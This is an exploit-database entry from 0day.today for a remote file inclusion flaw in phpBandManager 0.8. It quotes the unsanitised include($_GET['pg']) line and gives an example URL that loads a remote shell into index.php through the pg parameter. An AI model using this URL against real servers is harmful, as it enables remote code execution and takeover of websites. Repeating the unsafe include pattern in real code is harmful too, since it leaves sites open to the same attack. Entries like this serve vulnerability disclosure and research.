[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability

Author
koray
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1798
Category
web applications
Date add
25-04-2007
Platform
unsorted
=====================================================================
phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability
=====================================================================


author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?



#  0day.today [2024-11-16]  #